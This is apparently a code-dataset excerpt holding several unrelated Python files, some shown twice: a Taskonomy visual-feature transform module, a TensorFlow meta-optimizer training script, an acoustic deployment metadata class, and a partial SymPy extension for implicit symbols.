<NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>.
Arxiv preprint 2018.
This function expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8*k, 16, 16)
'''
return VisualPrior.max_coverage_transform(img, k, device)
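# Illustrative note (derived from VisualPrior.max_coverate_featuresets defined
# below, not from the original docs): k selects the k-task featureset, e.g.
# k=2 uses ['segment_unsup2d', 'segment_unsup25d'] and therefore returns
# 2 * 8 = 16 feature channels.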
def feature_readout(img, feature_task='normal', device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task,
then returns the result of a readout of the feature.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
        shape  (batch_size, C, 256, 256)
'''
return VisualPrior.to_predicted_label(img, feature_tasks=[feature_task], device=device)
def multi_feature_readout(img, feature_tasks=['normal'], device=default_device):
'''
    Transforms an RGB image into features driven by some vision tasks
then returns the readouts of the features.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
        shape  (batch_size, C, 256, 256), with channels concatenated across tasks
'''
return VisualPrior.to_predicted_label(img, feature_tasks, device)
def get_networks(feature_tasks, train=False, decoder=False, device=torch.device('cpu')):
'''
    Return Taskonomy encoders (and, if requested, decoders), with or without gradients.
Expects inputs:
feature_tasks list
train bool
decoder bool
device torch.device
Outputs:
list(nn.Module)
'''
return VisualPrior.get_nets(feature_tasks, train, decoder, device)
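# Illustrative note (an assumption based on the code above, not taken from the
# original docs): `get_networks(['normal'], train=True)` should return a
# one-element list holding a TaskonomyEncoder whose parameters have
# requires_grad=True, which is the hook for fine-tuning the pretrained encoder.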
def get_viable_feature_tasks():
'''
Return viable feature tasks as list of strings.
Outputs:
list(str)
'''
return VisualPrior.viable_feature_tasks
def get_max_coverate_featuresets():
'''
    Return the max-coverage featuresets as a list of lists of strings.
Outputs:
list(list(str))
'''
return VisualPrior.max_coverate_featuresets
class VisualPrior(object):
max_coverate_featuresets = [
['autoencoding'],
['segment_unsup2d', 'segment_unsup25d'],
['edge_texture', 'reshading', 'curvature'],
['normal', 'keypoints2d', 'segment_unsup2d', 'segment_semantic'],
]
model_dir = None
viable_feature_tasks = [
'autoencoding',
'colorization',
'curvature',
'denoising',
'edge_texture',
'edge_occlusion',
'egomotion',
'fixated_pose',
'jigsaw',
'keypoints2d',
'keypoints3d',
'nonfixated_pose',
'point_matching',
'reshading',
'depth_zbuffer',
'depth_euclidean',
'normal',
'room_layout',
'segment_unsup25d',
'segment_unsup2d',
'segment_semantic',
'class_object',
'class_scene',
'inpainting',
'vanishing_point']
@classmethod
def to_representation(cls, img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task(s)
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
            shape  (batch_size, 8*len(feature_tasks), 16, 16)
        This function is technically unsupported and there are absolutely no guarantees.
'''
VisualPriorRepresentation._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorRepresentation.feature_task_to_net[t] = VisualPriorRepresentation.feature_task_to_net[t].to(device)
nets = [VisualPriorRepresentation.feature_task_to_net[t] for t in feature_tasks]
with torch.no_grad():
return torch.cat([net(img) for net in nets], dim=1)
@classmethod
def to_predicted_label(cls, img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a predicted label for some task.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, C, 256, 256)
values [-1,1]
        This function is technically unsupported and there are absolutely no guarantees.
'''
VisualPriorPredictedLabel._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorPredictedLabel.feature_task_to_net[t] = VisualPriorPredictedLabel.feature_task_to_net[t].to(device)
nets = [VisualPriorPredictedLabel.feature_task_to_net[t] for t in feature_tasks]
with torch.no_grad():
return torch.cat([net(img) for net in nets], dim=1)
@classmethod
def max_coverage_transform(cls, img, k=4, device=default_device):
assert k > 0, 'Number of features to use for the max_coverage_transform must be > 0'
if k > 4:
raise NotImplementedError("max_coverage_transform featureset not implemented for k > 4")
return cls.to_representation(img, feature_tasks=cls.max_coverate_featuresets[k - 1], device=device)
@classmethod
def set_model_dir(cls, model_dir):
cls.model_dir = model_dir
@classmethod
def get_nets(cls, feature_tasks, train, decoder, device):
if decoder:
if len(feature_tasks) == 1:
VisualPriorPredictedLabel._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorPredictedLabel.feature_task_to_net[t] = VisualPriorPredictedLabel.feature_task_to_net[t].to(device)
nets = [VisualPriorPredictedLabel.feature_task_to_net[t] for t in feature_tasks]
else:
raise NotImplementedError("Decoder retrieval only implemented for single feature task.")
else:
VisualPriorRepresentation._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorRepresentation.feature_task_to_net[t] = VisualPriorRepresentation.feature_task_to_net[t].to(device)
nets = [VisualPriorRepresentation.feature_task_to_net[t] for t in feature_tasks]
if train:
for net in nets:
# method override in taskonomy_network.py -> TaskonomyNetwork
net.train(False)
for p in net.parameters():
p.requires_grad = True
return nets
class VisualPriorRepresentation(object):
'''
Handles loading networks that transform images into encoded features.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
feature_task_to_net = {}
@classmethod
def _load_unloaded_nets(cls, feature_tasks, model_dir=None):
net_paths_to_load = []
feature_tasks_to_load = []
for feature_task in feature_tasks:
if feature_task not in cls.feature_task_to_net:
net_paths_to_load.append(TASKONOMY_PRETRAINED_URLS[feature_task + '_encoder'])
feature_tasks_to_load.append(feature_task)
nets = cls._load_networks(net_paths_to_load)
for feature_task, net in zip(feature_tasks_to_load, nets):
cls.feature_task_to_net[feature_task] = net
@classmethod
def _load_networks(cls, network_paths, model_dir=None):
return [cls._load_encoder(url, model_dir) for url in network_paths]
@classmethod
def _load_encoder(cls, url, model_dir=None, progress=True):
net = TaskonomyEncoder() #.cuda()
net.eval()
checkpoint = torch.utils.model_zoo.load_url(url, model_dir=model_dir, progress=progress)
net.load_state_dict(checkpoint['state_dict'])
for p in net.parameters():
p.requires_grad = False
# net = Compose(nn.GroupNorm(32, 32, affine=False), net)
return net
class VisualPriorPredictedLabel(object):
'''
    Handles loading networks that transform images into predicted task labels.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, C, 256, 256)
values [-1,1]
This class is technically unsupported and there are absolutely no guarantees.
'''
feature_task_to_net = {}
@classmethod
def _load_unloaded_nets(cls, feature_tasks, model_dir=None):
net_paths_to_load = []
feature_tasks_to_load = []
for feature_task in feature_tasks:
if feature_task not in cls.feature_task_to_net:
if feature_task not in TASKS_TO_CHANNELS:
raise NotImplementedError('Task {} not implemented in VisualPriorPredictedLabel'.format(feature_task))
net_paths_to_load.append((TASKS_TO_CHANNELS[feature_task],
TASKONOMY_PRETRAINED_URLS[feature_task + '_encoder'],
TASKONOMY_PRETRAINED_URLS[feature_task + '_decoder']))
feature_tasks_to_load.append(feature_task)
nets = cls._load_networks(net_paths_to_load)
for feature_task, net in zip(feature_tasks_to_load, nets):
cls.feature_task_to_net[feature_task] = net
@classmethod
def _load_networks(cls, network_paths, model_dir=None, progress=True):
nets = []
for out_channels, encoder_path, decoder_path in network_paths:
nets.append(TaskonomyNetwork(
out_channels=out_channels,
load_encoder_path=encoder_path,
load_decoder_path=decoder_path,
model_dir=model_dir,
progress=progress))
return nets
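# ----------------------------------------------------------------------------
# Minimal usage sketch (added for illustration, not part of the original
# module).  It exercises `representation_transform` with a dummy batch; the
# input range, shapes and the 'normal' task name follow the docstrings above.
# Running it downloads the pretrained Taskonomy encoder weights on first use.
if __name__ == '__main__':
    x = torch.rand(1, 3, 256, 256) * 2 - 1       # dummy image scaled to [-1, 1]
    feats = representation_transform(x, feature_task='normal', device='cpu')
    print(feats.shape)                           # (1, 8, 16, 16) per the docstrings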
|
visualpriors/transforms.py
|
from .taskonomy_network import TaskonomyEncoder, TaskonomyDecoder, TaskonomyNetwork, TASKONOMY_PRETRAINED_URLS, TASKS_TO_CHANNELS
import multiprocessing.dummy as mp
import torch
default_device = 'cuda' if torch.cuda.is_available() else 'cpu'
def representation_transform(img, feature_task='normal', device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
return VisualPrior.to_representation(img, feature_tasks=[feature_task], device=device)
def multi_representation_transform(img, feature_tasks=['normal'], device=default_device):
'''
    Transforms an RGB image into features driven by some vision tasks
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
        shape  (batch_size, 8*len(feature_tasks), 16, 16)
'''
return VisualPrior.to_representation(img, feature_tasks, device)
def max_coverage_featureset_transform(img, k=4, device=default_device):
'''
    Transforms an RGB image into features driven by a set of vision tasks.
The tasks are chosen according to the Max-Coverage Min-Distance Featureset
From the paper:
Mid-Level Visual Representations Improve Generalization and Sample Efficiency
for Learning Visuomotor Policies.
<NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>.
Arxiv preprint 2018.
This function expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8*k, 16, 16)
'''
return VisualPrior.max_coverage_transform(img, k, device)
def feature_readout(img, feature_task='normal', device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task,
then returns the result of a readout of the feature.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
        shape  (batch_size, C, 256, 256)
'''
return VisualPrior.to_predicted_label(img, feature_tasks=[feature_task], device=device)
def multi_feature_readout(img, feature_tasks=['normal'], device=default_device):
'''
    Transforms an RGB image into features driven by some vision tasks
then returns the readouts of the features.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
        shape  (batch_size, C, 256, 256), with channels concatenated across tasks
'''
return VisualPrior.to_predicted_label(img, feature_tasks, device)
def get_networks(feature_tasks, train=False, decoder=False, device=torch.device('cpu')):
'''
    Return Taskonomy encoders (and, if requested, decoders), with or without gradients.
Expects inputs:
feature_tasks list
train bool
decoder bool
device torch.device
Outputs:
list(nn.Module)
'''
return VisualPrior.get_nets(feature_tasks, train, decoder, device)
def get_viable_feature_tasks():
'''
Return viable feature tasks as list of strings.
Outputs:
list(str)
'''
return VisualPrior.viable_feature_tasks
def get_max_coverate_featuresets():
'''
    Return the max-coverage featuresets as a list of lists of strings.
Outputs:
list(list(str))
'''
return VisualPrior.max_coverate_featuresets
class VisualPrior(object):
max_coverate_featuresets = [
['autoencoding'],
['segment_unsup2d', 'segment_unsup25d'],
['edge_texture', 'reshading', 'curvature'],
['normal', 'keypoints2d', 'segment_unsup2d', 'segment_semantic'],
]
model_dir = None
viable_feature_tasks = [
'autoencoding',
'colorization',
'curvature',
'denoising',
'edge_texture',
'edge_occlusion',
'egomotion',
'fixated_pose',
'jigsaw',
'keypoints2d',
'keypoints3d',
'nonfixated_pose',
'point_matching',
'reshading',
'depth_zbuffer',
'depth_euclidean',
'normal',
'room_layout',
'segment_unsup25d',
'segment_unsup2d',
'segment_semantic',
'class_object',
'class_scene',
'inpainting',
'vanishing_point']
@classmethod
def to_representation(cls, img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a feature driven by some vision task(s)
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
            shape  (batch_size, 8*len(feature_tasks), 16, 16)
        This function is technically unsupported and there are absolutely no guarantees.
'''
VisualPriorRepresentation._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorRepresentation.feature_task_to_net[t] = VisualPriorRepresentation.feature_task_to_net[t].to(device)
nets = [VisualPriorRepresentation.feature_task_to_net[t] for t in feature_tasks]
with torch.no_grad():
return torch.cat([net(img) for net in nets], dim=1)
@classmethod
def to_predicted_label(cls, img, feature_tasks=['normal'], device=default_device):
'''
Transforms an RGB image into a predicted label for some task.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, C, 256, 256)
values [-1,1]
        This function is technically unsupported and there are absolutely no guarantees.
'''
VisualPriorPredictedLabel._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorPredictedLabel.feature_task_to_net[t] = VisualPriorPredictedLabel.feature_task_to_net[t].to(device)
nets = [VisualPriorPredictedLabel.feature_task_to_net[t] for t in feature_tasks]
with torch.no_grad():
return torch.cat([net(img) for net in nets], dim=1)
@classmethod
def max_coverage_transform(cls, img, k=4, device=default_device):
assert k > 0, 'Number of features to use for the max_coverage_transform must be > 0'
if k > 4:
raise NotImplementedError("max_coverage_transform featureset not implemented for k > 4")
return cls.to_representation(img, feature_tasks=cls.max_coverate_featuresets[k - 1], device=device)
@classmethod
def set_model_dir(cls, model_dir):
cls.model_dir = model_dir
@classmethod
def get_nets(cls, feature_tasks, train, decoder, device):
if decoder:
if len(feature_tasks) == 1:
VisualPriorPredictedLabel._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorPredictedLabel.feature_task_to_net[t] = VisualPriorPredictedLabel.feature_task_to_net[t].to(device)
nets = [VisualPriorPredictedLabel.feature_task_to_net[t] for t in feature_tasks]
else:
raise NotImplementedError("Decoder retrieval only implemented for single feature task.")
else:
VisualPriorRepresentation._load_unloaded_nets(feature_tasks)
for t in feature_tasks:
VisualPriorRepresentation.feature_task_to_net[t] = VisualPriorRepresentation.feature_task_to_net[t].to(device)
nets = [VisualPriorRepresentation.feature_task_to_net[t] for t in feature_tasks]
if train:
for net in nets:
# method override in taskonomy_network.py -> TaskonomyNetwork
net.train(False)
for p in net.parameters():
p.requires_grad = True
return nets
class VisualPriorRepresentation(object):
'''
Handles loading networks that transform images into encoded features.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, 8, 16, 16)
'''
feature_task_to_net = {}
@classmethod
def _load_unloaded_nets(cls, feature_tasks, model_dir=None):
net_paths_to_load = []
feature_tasks_to_load = []
for feature_task in feature_tasks:
if feature_task not in cls.feature_task_to_net:
net_paths_to_load.append(TASKONOMY_PRETRAINED_URLS[feature_task + '_encoder'])
feature_tasks_to_load.append(feature_task)
nets = cls._load_networks(net_paths_to_load)
for feature_task, net in zip(feature_tasks_to_load, nets):
cls.feature_task_to_net[feature_task] = net
@classmethod
def _load_networks(cls, network_paths, model_dir=None):
return [cls._load_encoder(url, model_dir) for url in network_paths]
@classmethod
def _load_encoder(cls, url, model_dir=None, progress=True):
net = TaskonomyEncoder() #.cuda()
net.eval()
checkpoint = torch.utils.model_zoo.load_url(url, model_dir=model_dir, progress=progress)
net.load_state_dict(checkpoint['state_dict'])
for p in net.parameters():
p.requires_grad = False
# net = Compose(nn.GroupNorm(32, 32, affine=False), net)
return net
class VisualPriorPredictedLabel(object):
'''
    Handles loading networks that transform images into predicted task labels.
Expects inputs:
shape (batch_size, 3, 256, 256)
values [-1,1]
Outputs:
shape (batch_size, C, 256, 256)
values [-1,1]
This class is technically unsupported and there are absolutely no guarantees.
'''
feature_task_to_net = {}
@classmethod
def _load_unloaded_nets(cls, feature_tasks, model_dir=None):
net_paths_to_load = []
feature_tasks_to_load = []
for feature_task in feature_tasks:
if feature_task not in cls.feature_task_to_net:
if feature_task not in TASKS_TO_CHANNELS:
raise NotImplementedError('Task {} not implemented in VisualPriorPredictedLabel'.format(feature_task))
net_paths_to_load.append((TASKS_TO_CHANNELS[feature_task],
TASKONOMY_PRETRAINED_URLS[feature_task + '_encoder'],
TASKONOMY_PRETRAINED_URLS[feature_task + '_decoder']))
feature_tasks_to_load.append(feature_task)
nets = cls._load_networks(net_paths_to_load)
for feature_task, net in zip(feature_tasks_to_load, nets):
cls.feature_task_to_net[feature_task] = net
@classmethod
def _load_networks(cls, network_paths, model_dir=None, progress=True):
nets = []
for out_channels, encoder_path, decoder_path in network_paths:
nets.append(TaskonomyNetwork(
out_channels=out_channels,
load_encoder_path=encoder_path,
load_decoder_path=decoder_path,
model_dir=model_dir,
progress=progress))
return nets
| 0.810891 | 0.500732 |
"""Learning 2 Learn training."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from six.moves import xrange
import tensorflow as tf
from tqdm import tqdm
from tensorflow.contrib.learn.python.learn import monitored_session as ms
import meta
import util
flags = tf.flags
logging = tf.logging
logging.set_verbosity(logging.ERROR)
FLAGS = flags.FLAGS
flags.DEFINE_string("save_path", None, "Path for saved meta-optimizer.")
flags.DEFINE_integer("num_epochs", 1000, "Number of training epochs.")
flags.DEFINE_integer("log_period", 100, "Log period.")
flags.DEFINE_integer("evaluation_period", 1000, "Evaluation period.")
flags.DEFINE_integer("evaluation_epochs", 20, "Number of evaluation epochs.")
flags.DEFINE_string("problem", "simple", "Type of problem.")
flags.DEFINE_integer("num_steps", 100,
"Number of optimization steps per epoch.")
flags.DEFINE_integer("unroll_length", 20, "Meta-optimizer unroll length.")
flags.DEFINE_float("learning_rate", 0.001, "Learning rate.")
flags.DEFINE_boolean("second_derivatives", False, "Use second derivatives.")
def main(_):
# Configuration.
num_unrolls = FLAGS.num_steps // FLAGS.unroll_length
if FLAGS.save_path is not None:
if os.path.exists(FLAGS.save_path):
raise ValueError("Folder {} already exists".format(FLAGS.save_path))
else:
os.mkdir(FLAGS.save_path)
# Problem.
problem, net_config, net_assignments = util.get_config(FLAGS.problem)
# Optimizer setup.
optimizer = meta.MetaOptimizer(**net_config)
minimize = optimizer.meta_minimize(
problem, FLAGS.unroll_length,
learning_rate=FLAGS.learning_rate,
net_assignments=net_assignments,
second_derivatives=FLAGS.second_derivatives)
step, update, reset, cost_op, _ = minimize
with ms.MonitoredSession() as sess:
# Prevent accidental changes to the graph.
tf.get_default_graph().finalize()
best_evaluation = float("inf")
total_time = 0
total_cost = 0
for e in tqdm(xrange(FLAGS.num_epochs), desc="epochs"):
# Training.
time, cost = util.run_epoch(sess, cost_op, [update, step], reset,
num_unrolls)
total_time += time
total_cost += cost
# Logging.
if (e + 1) % FLAGS.log_period == 0:
util.print_stats("Epoch {}".format(e + 1), total_cost, total_time,
FLAGS.log_period)
total_time = 0
total_cost = 0
# Evaluation.
if (e + 1) % FLAGS.evaluation_period == 0:
eval_cost = 0
eval_time = 0
for _ in xrange(FLAGS.evaluation_epochs):
time, cost = util.run_epoch(sess, cost_op, [update], reset,
num_unrolls)
eval_time += time
eval_cost += cost
util.print_stats("EVALUATION", eval_cost, eval_time,
FLAGS.evaluation_epochs)
if FLAGS.save_path is not None and eval_cost < best_evaluation:
print("Removing previously saved meta-optimizer")
for f in os.listdir(FLAGS.save_path):
os.remove(os.path.join(FLAGS.save_path, f))
print("Saving meta-optimizer to {}".format(FLAGS.save_path))
optimizer.save(sess, FLAGS.save_path)
best_evaluation = eval_cost
if __name__ == "__main__":
tf.app.run()
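# ----------------------------------------------------------------------------
# Example invocation (illustrative sketch; the flag names come from the
# DEFINE_* calls above, the values are arbitrary):
#
#     python train.py --problem=simple --num_epochs=1000 --num_steps=100 \
#         --unroll_length=20 --learning_rate=0.001 --save_path=./meta_opt
#
# Note that --save_path must name a directory that does not exist yet;
# main() raises a ValueError otherwise.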
|
train.py
|
"""Learning 2 Learn training."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from six.moves import xrange
import tensorflow as tf
from tqdm import tqdm
from tensorflow.contrib.learn.python.learn import monitored_session as ms
import meta
import util
flags = tf.flags
logging = tf.logging
logging.set_verbosity(logging.ERROR)
FLAGS = flags.FLAGS
flags.DEFINE_string("save_path", None, "Path for saved meta-optimizer.")
flags.DEFINE_integer("num_epochs", 1000, "Number of training epochs.")
flags.DEFINE_integer("log_period", 100, "Log period.")
flags.DEFINE_integer("evaluation_period", 1000, "Evaluation period.")
flags.DEFINE_integer("evaluation_epochs", 20, "Number of evaluation epochs.")
flags.DEFINE_string("problem", "simple", "Type of problem.")
flags.DEFINE_integer("num_steps", 100,
"Number of optimization steps per epoch.")
flags.DEFINE_integer("unroll_length", 20, "Meta-optimizer unroll length.")
flags.DEFINE_float("learning_rate", 0.001, "Learning rate.")
flags.DEFINE_boolean("second_derivatives", False, "Use second derivatives.")
def main(_):
# Configuration.
num_unrolls = FLAGS.num_steps // FLAGS.unroll_length
if FLAGS.save_path is not None:
if os.path.exists(FLAGS.save_path):
raise ValueError("Folder {} already exists".format(FLAGS.save_path))
else:
os.mkdir(FLAGS.save_path)
# Problem.
problem, net_config, net_assignments = util.get_config(FLAGS.problem)
# Optimizer setup.
optimizer = meta.MetaOptimizer(**net_config)
minimize = optimizer.meta_minimize(
problem, FLAGS.unroll_length,
learning_rate=FLAGS.learning_rate,
net_assignments=net_assignments,
second_derivatives=FLAGS.second_derivatives)
step, update, reset, cost_op, _ = minimize
with ms.MonitoredSession() as sess:
# Prevent accidental changes to the graph.
tf.get_default_graph().finalize()
best_evaluation = float("inf")
total_time = 0
total_cost = 0
for e in tqdm(xrange(FLAGS.num_epochs), desc="epochs"):
# Training.
time, cost = util.run_epoch(sess, cost_op, [update, step], reset,
num_unrolls)
total_time += time
total_cost += cost
# Logging.
if (e + 1) % FLAGS.log_period == 0:
util.print_stats("Epoch {}".format(e + 1), total_cost, total_time,
FLAGS.log_period)
total_time = 0
total_cost = 0
# Evaluation.
if (e + 1) % FLAGS.evaluation_period == 0:
eval_cost = 0
eval_time = 0
for _ in xrange(FLAGS.evaluation_epochs):
time, cost = util.run_epoch(sess, cost_op, [update], reset,
num_unrolls)
eval_time += time
eval_cost += cost
util.print_stats("EVALUATION", eval_cost, eval_time,
FLAGS.evaluation_epochs)
if FLAGS.save_path is not None and eval_cost < best_evaluation:
print("Removing previously saved meta-optimizer")
for f in os.listdir(FLAGS.save_path):
os.remove(os.path.join(FLAGS.save_path, f))
print("Saving meta-optimizer to {}".format(FLAGS.save_path))
optimizer.save(sess, FLAGS.save_path)
best_evaluation = eval_cost
if __name__ == "__main__":
tf.app.run()
| 0.817246 | 0.230514 |
import pandas as pd
import os
class DeploymentInfo():
"""
    A class to handle acoustic deployment metadata.
Object carrying deployment metadata that can be used for example to populate
metadata fields in Annotation or Measurement objects.
Attributes
----------
data : pandas DataFrame
        DataFrame with deployment information.
Methods
-------
write_template(filepath)
Create an empty template csv file with the proper headers.
read(filepath)
Populates the DeploymentInfo object with the information from a csv
        file. The csv file must follow the same structure as the one created by
the method write_template.
"""
def __init__(self):
"""
Initialize object with empty .data attribute.
Returns
-------
None.
"""
self.data =[]
def write_template(self, filepath):
"""
Create a blank deployment file.
Create an empty template csv file with the proper headers. The created
csv file has only the headers and an operator must fill in all the
deployment information manually. Once filled in, this file can be used
by the DeploymentInfo.read method
Parameters
----------
filepath : str
path and name of the deployment csv file to create.
Returns
-------
        None. Writes a blank csv deployment file that an operator can fill in.
"""
if os.path.isfile(filepath):
raise ValueError('File already exists.')
metadata = pd.DataFrame({
'audio_channel_number': [],
'UTC_offset': [],
'sampling_frequency': [],
'bit_depth': [],
'mooring_platform_name': [],
'recorder_type': [],
'recorder_SN': [],
'hydrophone_model': [],
'hydrophone_SN': [],
'hydrophone_depth': [],
'location_name': [],
'location_lat': [],
'location_lon': [],
'location_water_depth': [],
'deployment_ID': [],
'deployment_date':[],
'recovery_date':[],
})
metadata.to_csv(filepath,
sep=',',
encoding='utf-8',
header=True,
index=False,
)
def read(self, filepath):
"""
Read metadata information from csv file.
        Load data from a csv file containing the deployment metadata information
        and populates the data attribute of the DeploymentInfo object. The csv
file must follow the same headers and data format as the csv file
template generated by DeploymentInfo.write_template.
Parameters
----------
filepath : str
Path of the csv file to read.
Returns
-------
        pandas.DataFrame. Also populates the pandas dataframe in the .data
        attribute of the DeploymentInfo object.
"""
df = pd.read_csv(filepath,
delimiter=',',
#header=None,
skiprows=0,
na_values=None,
)
self.data = df
return df
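# ----------------------------------------------------------------------------
# Minimal usage sketch (added for illustration, not part of the original
# module).  The temporary directory and file name are arbitrary choices.
if __name__ == "__main__":
    import tempfile
    demo_file = os.path.join(tempfile.mkdtemp(), "deployment_info.csv")
    deployment = DeploymentInfo()
    deployment.write_template(demo_file)  # blank csv for an operator to fill in
    df = deployment.read(demo_file)       # header-only csv -> empty DataFrame
    print(list(df.columns))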
|
ecosound/core/metadata.py
|
import pandas as pd
import os
class DeploymentInfo():
"""
    A class to handle acoustic deployment metadata.
Object carrying deployment metadata that can be used for example to populate
metadata fields in Annotation or Measurement objects.
Attributes
----------
data : pandas DataFrame
        DataFrame with deployment information.
Methods
-------
write_template(filepath)
Create an empty template csv file with the proper headers.
read(filepath)
Populates the DeploymentInfo object with the information from a csv
        file. The csv file must follow the same structure as the one created by
the method write_template.
"""
def __init__(self):
"""
Initialize object with empty .data attribute.
Returns
-------
None.
"""
self.data =[]
def write_template(self, filepath):
"""
Create a blank deployment file.
Create an empty template csv file with the proper headers. The created
csv file has only the headers and an operator must fill in all the
deployment information manually. Once filled in, this file can be used
by the DeploymentInfo.read method
Parameters
----------
filepath : str
path and name of the deployment csv file to create.
Returns
-------
        None. Writes a blank csv deployment file that an operator can fill in.
"""
if os.path.isfile(filepath):
raise ValueError('File already exists.')
metadata = pd.DataFrame({
'audio_channel_number': [],
'UTC_offset': [],
'sampling_frequency': [],
'bit_depth': [],
'mooring_platform_name': [],
'recorder_type': [],
'recorder_SN': [],
'hydrophone_model': [],
'hydrophone_SN': [],
'hydrophone_depth': [],
'location_name': [],
'location_lat': [],
'location_lon': [],
'location_water_depth': [],
'deployment_ID': [],
'deployment_date':[],
'recovery_date':[],
})
metadata.to_csv(filepath,
sep=',',
encoding='utf-8',
header=True,
index=False,
)
def read(self, filepath):
"""
Read metadata information from csv file.
        Load data from a csv file containing the deployment metadata information
        and populates the data attribute of the DeploymentInfo object. The csv
file must follow the same headers and data format as the csv file
template generated by DeploymentInfo.write_template.
Parameters
----------
filepath : str
Path of the csv file to read.
Returns
-------
        pandas.DataFrame. Also populates the pandas dataframe in the .data
        attribute of the DeploymentInfo object.
"""
df = pd.read_csv(filepath,
delimiter=',',
#header=None,
skiprows=0,
na_values=None,
)
self.data = df
return df
| 0.775095 | 0.477798 |
from sympy.core.symbol import Symbol
from sympy.tensor.indexed import Idx, IndexedBase, Indexed, IndexException
from sympy.core.compatibility import is_sequence
from sympy.core.singleton import S
from sympy.core.add import Add
from sympy.core.function import Derivative
from sympy.functions.special.tensor_functions import KroneckerDelta
from sympy.simplify.simplify import simplify
from sympy.concrete import Sum, Product
from sympy.core.containers import Tuple
base_str_total = r'\frac{{\text{{d}} {} }}{{\text{{d}} {} }}'
base_str_partial = r'\frac{{\partial {} }}{{\partial {} }}'
class ImplicitSymbol(Symbol):
def __new__(cls, name, args, **assumptions):
obj = Symbol.__new__(cls, name, **assumptions)
obj.functional_form = args
obj.base_str = base_str_total if len(obj._get_iter_func()) == 1\
else base_str_partial
return obj
def _get_iter_func(self):
funcof = self.functional_form
if not funcof:
return []
if not hasattr(self.functional_form, '__iter__'):
funcof = [self.functional_form]
return funcof
def _eval_subs(self, old, new):
if old == self:
return new
funcof = self._get_iter_func()
for a in funcof:
if a.has(old):
new_func = [x if x != a else a.subs(old, new)
for x in funcof]
return self.__class__(str(self), new_func)
return self
@property
def free_symbols(self):
return set([self]).union(*[
x.free_symbols for x in self._get_iter_func()])
def _eval_diff(self, wrt, **kw_args):
return self._eval_derivative(wrt)
def _get_df(self, a, wrt):
return ImplicitSymbol(self.base_str.format(
str(self.name), str(a)), args=self.functional_form)
def _eval_derivative(self, wrt):
if self == wrt:
return S.One
else:
funcof = self._get_iter_func()
i = 0
l = []
for a in funcof:
i += 1
da = a.diff(wrt)
if da is S.Zero:
continue
df = self._get_df(a, wrt)
l.append(df * da)
return Add(*l)
class MyIndexed(Indexed):
@property
def free_symbols(self):
return set([self])
class MyIndexedBase(IndexedBase):
@property
def free_symbols(self):
return set([self])
def __getitem__(self, indices, **kw_args):
if is_sequence(indices):
# Special case needed because M[*my_tuple] is a syntax error.
if self.shape and len(self.shape) != len(indices):
raise IndexException("Rank mismatch.")
return MyIndexed(self,
*indices, **kw_args)
else:
if self.shape and len(self.shape) != 1:
raise IndexException("Rank mismatch.")
return MyIndexed(self,
indices, **kw_args)
class IndexedFunc(MyIndexedBase):
def __new__(cls, label, args, shape=None, **kw_args):
obj = IndexedBase.__new__(cls, label, shape=shape, **kw_args)
obj.functional_form = args
return obj
def _eval_simplify(self, ratio=1.7, measure=None):
return self.__class__(self.label,
*[simplify(x, ratio=ratio, measure=measure)
for x in self._get_iter_func()])
def _get_subclass(self, *args):
return IndexedFunc.IndexedFuncValue(*args)
class IndexedFuncValue(MyIndexed):
def __new__(cls, base, *args):
functional_form = args[0]
obj = Indexed.__new__(cls, base, *args)
obj.functional_form = functional_form
obj.base_str = base_str_total if len(
obj._get_iter_func()) == 1 else base_str_partial
return obj
@property
def indices(self):
return self.args[2:]
def _eval_simplify(self, ratio=1.7, measure=None):
return self.__class__(
self.base,
*[simplify(x, ratio=ratio, measure=measure)
for x in self._get_iter_func()])
def _eval_subs(self, old, new):
if self == old:
return new
if any(x.has(old) for x in self._get_iter_func()):
return self.__class__(self.base,
tuple(x.subs(old, new)
for x in self._get_iter_func()),
*self.indices)
elif any(x.has(old) for x in self.indices):
return self.__class__(self.base,
self.functional_form,
*tuple(x.subs(old, new) for x in self.indices))
return self
def _get_iter_func(self):
funcof = self.functional_form
if not hasattr(self.functional_form, '__iter__'):
funcof = [self.functional_form]
return funcof
def _get_df(self, a, wrt):
return self.base.__class__(self.base_str.format(
str(self.base), str(a)), args=self.functional_form)[self.indices]
def _eval_diff(self, wrt, **kw_args):
return self._eval_derivative(wrt)
def _eval_derivative(self, wrt):
if self == wrt:
return S.One
